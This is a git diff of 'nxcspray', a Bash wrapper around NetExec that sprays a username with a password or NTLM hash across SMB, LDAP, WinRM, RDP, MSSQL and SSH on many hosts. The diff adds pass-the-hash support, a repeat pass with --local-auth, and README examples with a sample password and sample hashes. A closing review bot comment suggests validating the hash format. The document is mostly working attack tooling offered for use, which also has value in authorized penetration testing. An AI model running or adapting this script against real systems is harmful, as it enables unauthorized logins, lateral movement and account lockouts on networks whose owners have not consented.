11 changes: 9 additions & 2 deletions README.md
Expand Up @@ -6,14 +6,15 @@ Clone this repo or download the script directly.

Add the script to /usr/local/bin/ to execute it from anywhere on your machine, or use it in a local directory of your choice.
```
sudo mv ~/Downloads/nxcspray /usr/local/bin
git clone https://github.com/sidsherrill1/nxcspray.git && cd nxcspray
sudo mv nxcspray /usr/local/bin
chmod +x /usr/local/bin/nxcspray
```

# Usage
```
└─$ nxcspray -h
[-] Usage: nxcspray <protocols|all> <targets> -u <username> -p <password>
[-] Usage: /usr/local/bin/nxcspray <protocols|all> <targets> -u <username> (-p <password> | -H <ntlm_hash>)
```

Example Usage
Expand All @@ -29,3 +30,9 @@ nxcspray all 10.1.45.200 -u e.hills -p 'Il0vemyj0b2025!'
```
<img width="1315" height="365" alt="image" src="https://github.com/user-attachments/assets/65453924-98c5-44c1-975c-bfb40968ef88" />



```
nxcspray smb,ldap,winrm hosts.txt -u bob -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30a0e5adb2efe0ecd
nxcspray rdp 10.0.0.5 -u Administrator -H 5fbc3d5fec8206a30a0e5adb2efe0ecd
```
86 changes: 79 additions & 7 deletions nxcspray
@@ -1,41 +1,95 @@
#!/bin/bash

# Spray credentials across NetExec (nxc) protocols. Requires `nxc` on PATH
# (NetExec is commonly installed on Kali and other offensive-security distros).
#
# Usage:
# nxcspray <protocols|all> <targets> -u <username> -p <password>
# nxcspray <protocols|all> <targets> -u <username> -p <password> [-N|--no-bruteforce]
# nxcspray <protocols|all> <targets> -u <username> -H <lm:nt|nt_hash> [-N|--no-bruteforce]
#
# Use either -p (password) or -H (NTLM hash), not both.
#
# Optional: -N or --no-bruteforce appends nxc's --no-bruteforce to each run (see NetExec
# docs; commonly used with user/password files for one-to-one pairing instead of full combinatorics).
#
# Examples:
# nxcspray all 10.10.10.10 -u bob -p password
# nxcspray smb,ldap,winrm hosts.txt -u bob -p password
# nxcspray smb,ldap,winrm hosts.txt -u bob -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30a0e5adb2efe0ecd
# nxcspray rdp 10.0.0.5 -u Administrator -H 5fbc3d5fec8206a30a0e5adb2efe0ecd
# nxcspray smb 10.0.0.5 -u Administrator -p secret --no-bruteforce
#
# Each protocol/target is tried without nxc's --local-auth, then again with
# --local-auth where supported (ldap and ssh omit the second pass).

# ---- Argument Validation ----
if [ "$#" -lt 4 ]; then
echo "[-] Usage: $0 <protocols|all> <targets> -u <username> -p <password>"
echo "[-] Usage: $0 <protocols|all> <targets> -u <username> (-p <password> | -H <ntlm_hash>) [-N|--no-bruteforce]"
exit 1
fi

PROTOS_RAW="$1"
TARGETS_RAW="$2"
shift 2

NO_BRUTEFORCE=false
REMAINING=()
while [ $# -gt 0 ]; do
case "$1" in
--no-bruteforce)
NO_BRUTEFORCE=true
shift
;;
*)
REMAINING+=("$1")
shift
;;
esac
done
set -- "${REMAINING[@]}"

USER=""
PASS=""
HASH=""

while getopts "u:p:" opt; do
while getopts "u:p:H:N" opt; do
case $opt in
u) USER="$OPTARG" ;;
p) PASS="$OPTARG" ;;
H) HASH="$OPTARG" ;;
N) NO_BRUTEFORCE=true ;;
*)
echo "[-] Invalid flag"
exit 1
;;
esac
done

if [ -z "$USER" ] || [ -z "$PASS" ]; then
echo "[-] Missing required flags: -u <username> -p <password>"
EXTRA_NXC=()
if [ "$NO_BRUTEFORCE" = true ]; then
EXTRA_NXC+=(--no-bruteforce)
fi

if [ -z "$USER" ]; then
echo "[-] Missing required flag: -u <username>"
exit 1
fi

if [ -n "$PASS" ] && [ -n "$HASH" ]; then
echo "[-] Use only one of -p <password> or -H <ntlm_hash>, not both"
exit 1
fi

if [ -z "$PASS" ] && [ -z "$HASH" ]; then
echo "[-] Missing credentials: provide -p <password> or -H <ntlm_hash>"
exit 1
fi

if [ -n "$HASH" ]; then
AUTH_MODE="hash"
else
AUTH_MODE="password"
fi

# ---- Protocol Handling ----
if [ "$PROTOS_RAW" = "all" ]; then
PROTO_ARRAY=(smb ldap winrm rdp mssql ssh)
Expand All @@ -56,6 +110,24 @@ for PROTO in "${PROTO_ARRAY[@]}"; do

for TARGET in $TARGETS; do
echo " -> Target: $TARGET"
nxc "$PROTO" "$TARGET" -u "$USER" -p "$PASS"

if [ "$AUTH_MODE" = "hash" ] && [ "$PROTO" = "ssh" ]; then
echo " [!] Skipping: ssh does not use NTLM hash authentication"
continue
fi

run_nxc() {
if [ "$AUTH_MODE" = "password" ]; then
nxc "$PROTO" "$TARGET" -u "$USER" -p "$PASS" "${EXTRA_NXC[@]}" "$@"
else
nxc "$PROTO" "$TARGET" -u "$USER" -H "$HASH" "${EXTRA_NXC[@]}" "$@"
fi
}

run_nxc
if [ "$PROTO" != "ldap" ] && [ "$PROTO" != "ssh" ]; then
echo " -> (local-auth)"
run_nxc --local-auth
fi
done
done
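Review bot: The value passed to `-H` is accepted as any non-empty string (the `H) HASH="$OPTARG"` arm and the later `-n "$HASH"` tests), although the header comment documents it as `<lm:nt|nt_hash>`. A truncated or mistyped hash is therefore handed to nxc for every protocol and target, and again on the `--local-auth` pass, and each of those runs is presumably a failed logon against the account. I would reject a malformed value inside the `if [ -n "$HASH" ]` branch, before any nxc call, with `[[ "$HASH" =~ ^([0-9a-fA-F]{32}:)?[0-9a-fA-F]{32}$ ]] || { echo "[-] -H expects <lm:nt> or <nt>, 32 hex characters each"; exit 1; }`, widening the pattern if nxc accepts other forms. The protocol loop that consumes `HASH` begins outside the visible hunks.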